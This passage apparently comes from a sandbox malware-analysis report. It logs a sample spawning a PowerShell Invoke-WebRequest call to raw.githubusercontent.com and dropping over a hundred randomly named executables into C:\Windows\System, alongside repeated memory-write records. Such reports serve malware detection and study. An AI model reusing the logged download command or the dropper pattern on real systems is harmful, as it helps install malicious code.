PID 2356 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\YxfdizT.exe
PID 2356 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\YxfdizT.exe
PID 2356 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\YxfdizT.exe
PID 2356 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\mAPeyGv.exe
PID 2356 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\mAPeyGv.exe
PID 2356 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\mAPeyGv.exe
PID 2356 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\CqmuYOt.exe
PID 2356 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\CqmuYOt.exe
PID 2356 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\CqmuYOt.exe
PID 2356 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTUQqJJ.exe
PID 2356 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTUQqJJ.exe
PID 2356 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\BTUQqJJ.exe
PID 2356 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jIpWIOQ.exe
PID 2356 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jIpWIOQ.exe
PID 2356 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\jIpWIOQ.exe
PID 2356 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\OWshedB.exe
PID 2356 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\OWshedB.exe
PID 2356 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\OWshedB.exe
PID 2356 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aRdLAWV.exe
PID 2356 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aRdLAWV.exe
PID 2356 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\aRdLAWV.exe
PID 2356 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\lPinlgR.exe
PID 2356 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\lPinlgR.exe
PID 2356 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\lPinlgR.exe
PID 2356 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\woimUer.exe
PID 2356 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\woimUer.exe
PID 2356 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\woimUer.exe
PID 2356 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\kUGFVWr.exe
PID 2356 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\kUGFVWr.exe
PID 2356 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\kUGFVWr.exe
PID 2356 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\KkKcEWF.exe
PID 2356 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\KkKcEWF.exe
PID 2356 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\KkKcEWF.exe
PID 2356 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\eebjxNd.exe
PID 2356 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\eebjxNd.exe
PID 2356 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\eebjxNd.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\gyBVRSz.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\gyBVRSz.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\gyBVRSz.exe
PID 2356 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\TyAHvvX.exe
PID 2356 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\TyAHvvX.exe
PID 2356 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\TyAHvvX.exe
PID 2356 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bChjwQt.exe
PID 2356 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bChjwQt.exe
PID 2356 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\bChjwQt.exe
PID 2356 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\HKvGVLD.exe
PID 2356 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\HKvGVLD.exe
PID 2356 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\HKvGVLD.exe
PID 2356 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\uVlSmoO.exe
PID 2356 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\uVlSmoO.exe
PID 2356 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\uVlSmoO.exe
PID 2356 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\dPtXNjH.exe
PID 2356 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\dPtXNjH.exe
PID 2356 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\dPtXNjH.exe
PID 2356 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe C:\Windows\System\NRzpmRj.exe

Processes

C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\LlqKjMW.exe

C:\Windows\System\LlqKjMW.exe

C:\Windows\System\xpSnzVh.exe

C:\Windows\System\xpSnzVh.exe

C:\Windows\System\YxfdizT.exe

C:\Windows\System\YxfdizT.exe

C:\Windows\System\mAPeyGv.exe

C:\Windows\System\mAPeyGv.exe

C:\Windows\System\CqmuYOt.exe

C:\Windows\System\CqmuYOt.exe

C:\Windows\System\BTUQqJJ.exe

C:\Windows\System\BTUQqJJ.exe

C:\Windows\System\jIpWIOQ.exe

C:\Windows\System\jIpWIOQ.exe

C:\Windows\System\OWshedB.exe

C:\Windows\System\OWshedB.exe

C:\Windows\System\aRdLAWV.exe

C:\Windows\System\aRdLAWV.exe

C:\Windows\System\lPinlgR.exe

C:\Windows\System\lPinlgR.exe

C:\Windows\System\woimUer.exe

C:\Windows\System\woimUer.exe

C:\Windows\System\kUGFVWr.exe

C:\Windows\System\kUGFVWr.exe

C:\Windows\System\KkKcEWF.exe

C:\Windows\System\KkKcEWF.exe

C:\Windows\System\eebjxNd.exe

C:\Windows\System\eebjxNd.exe

C:\Windows\System\gyBVRSz.exe

C:\Windows\System\gyBVRSz.exe

C:\Windows\System\TyAHvvX.exe

C:\Windows\System\TyAHvvX.exe

C:\Windows\System\bChjwQt.exe

C:\Windows\System\bChjwQt.exe

C:\Windows\System\HKvGVLD.exe

C:\Windows\System\HKvGVLD.exe

C:\Windows\System\uVlSmoO.exe

C:\Windows\System\uVlSmoO.exe

C:\Windows\System\dPtXNjH.exe

C:\Windows\System\dPtXNjH.exe

C:\Windows\System\NRzpmRj.exe

C:\Windows\System\NRzpmRj.exe

C:\Windows\System\LeHznzc.exe

C:\Windows\System\LeHznzc.exe

C:\Windows\System\IbmqqGg.exe

C:\Windows\System\IbmqqGg.exe

C:\Windows\System\yZSIjxK.exe

C:\Windows\System\yZSIjxK.exe

C:\Windows\System\aZDDHpW.exe

C:\Windows\System\aZDDHpW.exe

C:\Windows\System\BTNuzuT.exe

C:\Windows\System\BTNuzuT.exe

C:\Windows\System\bpXpuCF.exe

C:\Windows\System\bpXpuCF.exe

C:\Windows\System\FtVNBcy.exe

C:\Windows\System\FtVNBcy.exe

C:\Windows\System\jhmPsGZ.exe

C:\Windows\System\jhmPsGZ.exe

C:\Windows\System\IKmGIZw.exe

C:\Windows\System\IKmGIZw.exe

C:\Windows\System\QspGHFu.exe

C:\Windows\System\QspGHFu.exe

C:\Windows\System\DZFQdqC.exe

C:\Windows\System\DZFQdqC.exe

C:\Windows\System\MVDnatk.exe

C:\Windows\System\MVDnatk.exe

C:\Windows\System\aIQIMQW.exe

C:\Windows\System\aIQIMQW.exe

C:\Windows\System\gMutRvB.exe

C:\Windows\System\gMutRvB.exe

C:\Windows\System\gWBuYba.exe

C:\Windows\System\gWBuYba.exe

C:\Windows\System\AfwsfgN.exe

C:\Windows\System\AfwsfgN.exe

C:\Windows\System\MVowJMC.exe

C:\Windows\System\MVowJMC.exe

C:\Windows\System\ALsarBM.exe

C:\Windows\System\ALsarBM.exe

C:\Windows\System\YcuCBJw.exe

C:\Windows\System\YcuCBJw.exe

C:\Windows\System\RDbxMZD.exe

C:\Windows\System\RDbxMZD.exe

C:\Windows\System\nUoeDXI.exe

C:\Windows\System\nUoeDXI.exe

C:\Windows\System\PeGyTTM.exe

C:\Windows\System\PeGyTTM.exe

C:\Windows\System\SoNjOeE.exe

C:\Windows\System\SoNjOeE.exe

C:\Windows\System\qvQaBAe.exe

C:\Windows\System\qvQaBAe.exe

C:\Windows\System\HsPutQG.exe

C:\Windows\System\HsPutQG.exe

C:\Windows\System\hZbFCdx.exe

C:\Windows\System\hZbFCdx.exe

C:\Windows\System\lDLgnkO.exe

C:\Windows\System\lDLgnkO.exe

C:\Windows\System\aAgNunv.exe

C:\Windows\System\aAgNunv.exe

C:\Windows\System\fnCnHQN.exe

C:\Windows\System\fnCnHQN.exe

C:\Windows\System\WImwSLW.exe

C:\Windows\System\WImwSLW.exe

C:\Windows\System\WkipXMl.exe

C:\Windows\System\WkipXMl.exe

C:\Windows\System\llWLZvv.exe

C:\Windows\System\llWLZvv.exe

C:\Windows\System\MWFIuEm.exe

C:\Windows\System\MWFIuEm.exe

C:\Windows\System\AKzOFxt.exe

C:\Windows\System\AKzOFxt.exe

C:\Windows\System\qNVRbEu.exe

C:\Windows\System\qNVRbEu.exe

C:\Windows\System\NWOYoUs.exe

C:\Windows\System\NWOYoUs.exe

C:\Windows\System\wrIyQAx.exe

C:\Windows\System\wrIyQAx.exe

C:\Windows\System\cBXiPFt.exe

C:\Windows\System\cBXiPFt.exe

C:\Windows\System\zgBezij.exe

C:\Windows\System\zgBezij.exe

C:\Windows\System\FPppyfT.exe

C:\Windows\System\FPppyfT.exe

C:\Windows\System\PMtVLsP.exe

C:\Windows\System\PMtVLsP.exe

C:\Windows\System\cJVLsyx.exe

C:\Windows\System\cJVLsyx.exe

C:\Windows\System\oilzCTt.exe

C:\Windows\System\oilzCTt.exe

C:\Windows\System\dFhAQPB.exe

C:\Windows\System\dFhAQPB.exe

C:\Windows\System\mEqiepl.exe

C:\Windows\System\mEqiepl.exe

C:\Windows\System\LqcjFtN.exe

C:\Windows\System\LqcjFtN.exe

C:\Windows\System\GVwqhmq.exe

C:\Windows\System\GVwqhmq.exe

C:\Windows\System\IExxHqq.exe

C:\Windows\System\IExxHqq.exe

C:\Windows\System\VwRIQsL.exe

C:\Windows\System\VwRIQsL.exe

C:\Windows\System\CNMuNTa.exe

C:\Windows\System\CNMuNTa.exe

C:\Windows\System\zhRxllw.exe

C:\Windows\System\zhRxllw.exe

C:\Windows\System\NDDBsLZ.exe

C:\Windows\System\NDDBsLZ.exe

C:\Windows\System\AnAvwWv.exe

C:\Windows\System\AnAvwWv.exe

C:\Windows\System\tANnSAq.exe

C:\Windows\System\tANnSAq.exe

C:\Windows\System\koxNByP.exe

C:\Windows\System\koxNByP.exe

C:\Windows\System\EUNtkoe.exe

C:\Windows\System\EUNtkoe.exe

C:\Windows\System\KgmyEtE.exe

C:\Windows\System\KgmyEtE.exe

C:\Windows\System\WiEuxrN.exe

C:\Windows\System\WiEuxrN.exe

C:\Windows\System\XDYcvsJ.exe

C:\Windows\System\XDYcvsJ.exe

C:\Windows\System\TEKOxOQ.exe

C:\Windows\System\TEKOxOQ.exe

C:\Windows\System\cnbDMVD.exe

C:\Windows\System\cnbDMVD.exe

C:\Windows\System\XvdgOnu.exe

C:\Windows\System\XvdgOnu.exe

C:\Windows\System\tIyGfQN.exe

C:\Windows\System\tIyGfQN.exe

C:\Windows\System\ygtQLbK.exe

C:\Windows\System\ygtQLbK.exe

C:\Windows\System\BtyACMf.exe

C:\Windows\System\BtyACMf.exe

C:\Windows\System\PPfEcLL.exe

C:\Windows\System\PPfEcLL.exe

C:\Windows\System\rrryVEE.exe

C:\Windows\System\rrryVEE.exe

C:\Windows\System\IuQDHiU.exe

C:\Windows\System\IuQDHiU.exe

C:\Windows\System\pHxBCXZ.exe

C:\Windows\System\pHxBCXZ.exe

C:\Windows\System\FIEdHMw.exe

C:\Windows\System\FIEdHMw.exe

C:\Windows\System\QUvUfPM.exe

C:\Windows\System\QUvUfPM.exe

C:\Windows\System\ZgaxPsx.exe

C:\Windows\System\ZgaxPsx.exe

C:\Windows\System\zeQrMMd.exe

C:\Windows\System\zeQrMMd.exe

C:\Windows\System\wCPZUEo.exe

C:\Windows\System\wCPZUEo.exe

C:\Windows\System\HEkWvWW.exe

C:\Windows\System\HEkWvWW.exe

C:\Windows\System\QXsWejh.exe

C:\Windows\System\QXsWejh.exe

C:\Windows\System\OBzQHXH.exe

C:\Windows\System\OBzQHXH.exe

C:\Windows\System\eMHAsZY.exe

C:\Windows\System\eMHAsZY.exe

C:\Windows\System\yJgfyeZ.exe

C:\Windows\System\yJgfyeZ.exe

C:\Windows\System\SOVtvFZ.exe

C:\Windows\System\SOVtvFZ.exe

C:\Windows\System\nMzteSc.exe

C:\Windows\System\nMzteSc.exe

C:\Windows\System\wHjZtzX.exe

C:\Windows\System\wHjZtzX.exe

C:\Windows\System\LKKzRps.exe

C:\Windows\System\LKKzRps.exe

C:\Windows\System\jNptcjZ.exe

C:\Windows\System\jNptcjZ.exe

C:\Windows\System\fJAecnd.exe

C:\Windows\System\fJAecnd.exe

C:\Windows\System\ZXTTGWq.exe

C:\Windows\System\ZXTTGWq.exe

C:\Windows\System\qswnLuO.exe

C:\Windows\System\qswnLuO.exe

C:\Windows\System\jPbAtKY.exe

C:\Windows\System\jPbAtKY.exe

C:\Windows\System\fpuPZpv.exe

C:\Windows\System\fpuPZpv.exe

C:\Windows\System\VfZCedm.exe

C:\Windows\System\VfZCedm.exe

C:\Windows\System\eZNFpzP.exe

C:\Windows\System\eZNFpzP.exe

C:\Windows\System\EQrxKUS.exe

C:\Windows\System\EQrxKUS.exe

C:\Windows\System\fbClZSi.exe

C:\Windows\System\fbClZSi.exe

C:\Windows\System\nMqSiSa.exe

C:\Windows\System\nMqSiSa.exe

C:\Windows\System\onpdEzm.exe

C:\Windows\System\onpdEzm.exe

C:\Windows\System\jxKBrCB.exe

C:\Windows\System\jxKBrCB.exe

C:\Windows\System\Rnamskx.exe

C:\Windows\System\Rnamskx.exe

C:\Windows\System\fSljICG.exe

C:\Windows\System\fSljICG.exe

C:\Windows\System\jGKslfx.exe

C:\Windows\System\jGKslfx.exe

C:\Windows\System\nDvKlJr.exe

C:\Windows\System\nDvKlJr.exe

C:\Windows\System\FQNMFPK.exe

C:\Windows\System\FQNMFPK.exe

C:\Windows\System\LGpZPtH.exe

C:\Windows\System\LGpZPtH.exe

C:\Windows\System\TGUzvWH.exe

C:\Windows\System\TGUzvWH.exe

C:\Windows\System\jpxEVMA.exe

C:\Windows\System\jpxEVMA.exe

C:\Windows\System\WpvEAQO.exe

C:\Windows\System\WpvEAQO.exe

C:\Windows\System\OJleEUP.exe

C:\Windows\System\OJleEUP.exe

C:\Windows\System\pWfkuFh.exe

C:\Windows\System\pWfkuFh.exe

C:\Windows\System\fSQcTUi.exe

C:\Windows\System\fSQcTUi.exe

C:\Windows\System\toAPawU.exe

C:\Windows\System\toAPawU.exe

C:\Windows\System\doBDEDx.exe

C:\Windows\System\doBDEDx.exe

C:\Windows\System\DGxjbos.exe

C:\Windows\System\DGxjbos.exe

C:\Windows\System\TIztdGV.exe

C:\Windows\System\TIztdGV.exe

C:\Windows\System\hNGxAhI.exe

C:\Windows\System\hNGxAhI.exe

C:\Windows\System\dFjGrGr.exe

C:\Windows\System\dFjGrGr.exe

C:\Windows\System\irhAUld.exe

C:\Windows\System\irhAUld.exe

C:\Windows\System\slCvpCN.exe

C:\Windows\System\slCvpCN.exe

C:\Windows\System\tKlSbLi.exe

C:\Windows\System\tKlSbLi.exe

C:\Windows\System\QCzioNe.exe

C:\Windows\System\QCzioNe.exe

C:\Windows\System\lMpDETL.exe

C:\Windows\System\lMpDETL.exe

C:\Windows\System\RyEDFyI.exe

C:\Windows\System\RyEDFyI.exe

C:\Windows\System\yhtiyrz.exe

C:\Windows\System\yhtiyrz.exe

C:\Windows\System\QTpcoGR.exe

C:\Windows\System\QTpcoGR.exe

C:\Windows\System\ViPIfyk.exe

C:\Windows\System\ViPIfyk.exe

C:\Windows\System\DSknVRy.exe

C:\Windows\System\DSknVRy.exe

C:\Windows\System\MCbqKfJ.exe

C:\Windows\System\MCbqKfJ.exe

C:\Windows\System\HKQsmBf.exe

C:\Windows\System\HKQsmBf.exe

C:\Windows\System\NYwimyJ.exe

C:\Windows\System\NYwimyJ.exe

C:\Windows\System\xJfVXAj.exe

C:\Windows\System\xJfVXAj.exe

C:\Windows\System\HYpGzzp.exe

C:\Windows\System\HYpGzzp.exe

C:\Windows\System\hiWHMle.exe

C:\Windows\System\hiWHMle.exe

C:\Windows\System\izwijDQ.exe

C:\Windows\System\izwijDQ.exe

C:\Windows\System\SLOsuVS.exe

C:\Windows\System\SLOsuVS.exe

C:\Windows\System\wxIuhot.exe

C:\Windows\System\wxIuhot.exe

C:\Windows\System\yCwzJNx.exe

C:\Windows\System\yCwzJNx.exe

C:\Windows\System\oveInom.exe

C:\Windows\System\oveInom.exe

C:\Windows\System\esuWzVv.exe

C:\Windows\System\esuWzVv.exe

C:\Windows\System\GjmkHpd.exe

C:\Windows\System\GjmkHpd.exe

C:\Windows\System\RkZcXZe.exe

C:\Windows\System\RkZcXZe.exe

C:\Windows\System\BAQSBlw.exe

C:\Windows\System\BAQSBlw.exe

C:\Windows\System\YNCJEnm.exe

C:\Windows\System\YNCJEnm.exe

C:\Windows\System\gEZDfeq.exe

C:\Windows\System\gEZDfeq.exe

C:\Windows\System\yWvmfLg.exe

C:\Windows\System\yWvmfLg.exe

C:\Windows\System\gAkgKTq.exe

C:\Windows\System\gAkgKTq.exe

C:\Windows\System\zaMBoHK.exe

C:\Windows\System\zaMBoHK.exe

C:\Windows\System\lXrWmFV.exe

C:\Windows\System\lXrWmFV.exe

C:\Windows\System\LDPsECp.exe

C:\Windows\System\LDPsECp.exe

C:\Windows\System\tqdLYFd.exe

C:\Windows\System\tqdLYFd.exe

C:\Windows\System\STIqWDK.exe

C:\Windows\System\STIqWDK.exe

C:\Windows\System\hAagoWT.exe

C:\Windows\System\hAagoWT.exe

C:\Windows\System\xOLGuFk.exe

C:\Windows\System\xOLGuFk.exe

C:\Windows\System\LgxvrpT.exe

C:\Windows\System\LgxvrpT.exe

C:\Windows\System\STVseQb.exe

C:\Windows\System\STVseQb.exe

C:\Windows\System\fGCJzDz.exe

C:\Windows\System\fGCJzDz.exe

C:\Windows\System\yxsUXWq.exe

C:\Windows\System\yxsUXWq.exe

C:\Windows\System\ddOIPbF.exe

C:\Windows\System\ddOIPbF.exe

C:\Windows\System\OoAWNKA.exe

C:\Windows\System\OoAWNKA.exe

C:\Windows\System\GUZtwss.exe

C:\Windows\System\GUZtwss.exe

C:\Windows\System\iOlMegT.exe

C:\Windows\System\iOlMegT.exe

C:\Windows\System\CNVhukO.exe

C:\Windows\System\CNVhukO.exe

C:\Windows\System\ErdKCBU.exe

C:\Windows\System\ErdKCBU.exe

C:\Windows\System\xvstYmX.exe

C:\Windows\System\xvstYmX.exe

C:\Windows\System\JVUUNle.exe

C:\Windows\System\JVUUNle.exe

C:\Windows\System\BNGdHFi.exe

C:\Windows\System\BNGdHFi.exe

C:\Windows\System\VfxVhEO.exe

C:\Windows\System\VfxVhEO.exe

C:\Windows\System\JyRtuGR.exe

C:\Windows\System\JyRtuGR.exe

C:\Windows\System\RgTXCgu.exe

C:\Windows\System\RgTXCgu.exe

C:\Windows\System\ChHdUAG.exe

C:\Windows\System\ChHdUAG.exe

C:\Windows\System\HAgmUVO.exe

C:\Windows\System\HAgmUVO.exe

C:\Windows\System\ZRqwICI.exe

C:\Windows\System\ZRqwICI.exe

C:\Windows\System\MhKKWck.exe

C:\Windows\System\MhKKWck.exe

C:\Windows\System\UffAmKh.exe

C:\Windows\System\UffAmKh.exe

C:\Windows\System\WhNrFvT.exe

C:\Windows\System\WhNrFvT.exe

C:\Windows\System\zqmvVDH.exe

C:\Windows\System\zqmvVDH.exe

C:\Windows\System\gcNubod.exe

C:\Windows\System\gcNubod.exe

C:\Windows\System\LCUciYt.exe

C:\Windows\System\LCUciYt.exe

C:\Windows\System\xRMRgpw.exe

C:\Windows\System\xRMRgpw.exe

C:\Windows\System\iVhnDrp.exe

C:\Windows\System\iVhnDrp.exe

C:\Windows\System\hlbYQaK.exe

C:\Windows\System\hlbYQaK.exe

C:\Windows\System\iSPJQYy.exe

C:\Windows\System\iSPJQYy.exe

C:\Windows\System\nTVOkbc.exe

C:\Windows\System\nTVOkbc.exe

C:\Windows\System\BRdXVIH.exe

C:\Windows\System\BRdXVIH.exe

C:\Windows\System\xOdgZKE.exe

C:\Windows\System\xOdgZKE.exe

C:\Windows\System\RceBJGa.exe

C:\Windows\System\RceBJGa.exe

C:\Windows\System\Huqhdgj.exe

C:\Windows\System\Huqhdgj.exe

C:\Windows\System\KSFCVKF.exe

C:\Windows\System\KSFCVKF.exe

C:\Windows\System\ymePpax.exe

C:\Windows\System\ymePpax.exe

C:\Windows\System\WCFqDvF.exe

C:\Windows\System\WCFqDvF.exe

C:\Windows\System\DAvQDSX.exe

C:\Windows\System\DAvQDSX.exe

C:\Windows\System\eORfZBH.exe

C:\Windows\System\eORfZBH.exe

C:\Windows\System\pKzHOfs.exe

C:\Windows\System\pKzHOfs.exe

C:\Windows\System\ClLLEih.exe

C:\Windows\System\ClLLEih.exe

C:\Windows\System\KEkNIlw.exe

C:\Windows\System\KEkNIlw.exe

C:\Windows\System\aKelOcm.exe

C:\Windows\System\aKelOcm.exe

C:\Windows\System\YlhuWon.exe

C:\Windows\System\YlhuWon.exe

C:\Windows\System\zYrVuJJ.exe

C:\Windows\System\zYrVuJJ.exe

C:\Windows\System\wzxtHJC.exe

C:\Windows\System\wzxtHJC.exe

C:\Windows\System\RQxLYJe.exe

C:\Windows\System\RQxLYJe.exe

C:\Windows\System\AdzcPqq.exe

C:\Windows\System\AdzcPqq.exe

C:\Windows\System\PRPYlWi.exe

C:\Windows\System\PRPYlWi.exe

C:\Windows\System\lqExeGd.exe

C:\Windows\System\lqExeGd.exe

C:\Windows\System\BnGzUkV.exe

C:\Windows\System\BnGzUkV.exe

C:\Windows\System\hyREcYz.exe

C:\Windows\System\hyREcYz.exe

C:\Windows\System\JayRkUz.exe

C:\Windows\System\JayRkUz.exe

C:\Windows\System\EHStgID.exe

C:\Windows\System\EHStgID.exe

C:\Windows\System\ohPciFK.exe

C:\Windows\System\ohPciFK.exe

C:\Windows\System\VtWXmEV.exe

C:\Windows\System\VtWXmEV.exe

C:\Windows\System\vGVppBH.exe

C:\Windows\System\vGVppBH.exe

C:\Windows\System\ygnwokn.exe

C:\Windows\System\ygnwokn.exe

C:\Windows\System\rFEMvmZ.exe

C:\Windows\System\rFEMvmZ.exe

C:\Windows\System\rLYLSnC.exe

C:\Windows\System\rLYLSnC.exe

C:\Windows\System\tArmHYk.exe

C:\Windows\System\tArmHYk.exe

C:\Windows\System\BYZMuBC.exe

C:\Windows\System\BYZMuBC.exe

C:\Windows\System\plshllG.exe

C:\Windows\System\plshllG.exe

C:\Windows\System\nmmTiYU.exe

C:\Windows\System\nmmTiYU.exe

C:\Windows\System\cDzDBIX.exe

C:\Windows\System\cDzDBIX.exe

C:\Windows\System\jKWOeWG.exe

C:\Windows\System\jKWOeWG.exe

C:\Windows\System\sfzHkbT.exe

C:\Windows\System\sfzHkbT.exe

C:\Windows\System\CbEHLFy.exe

C:\Windows\System\CbEHLFy.exe

C:\Windows\System\LCOayBo.exe

C:\Windows\System\LCOayBo.exe

C:\Windows\System\sPmDmWB.exe

C:\Windows\System\sPmDmWB.exe

C:\Windows\System\rsjUiJL.exe

C:\Windows\System\rsjUiJL.exe

C:\Windows\System\rWrcaSi.exe

C:\Windows\System\rWrcaSi.exe

C:\Windows\System\lXPabTy.exe

C:\Windows\System\lXPabTy.exe

C:\Windows\System\OmXVssg.exe

C:\Windows\System\OmXVssg.exe

C:\Windows\System\hXEYOmv.exe

C:\Windows\System\hXEYOmv.exe

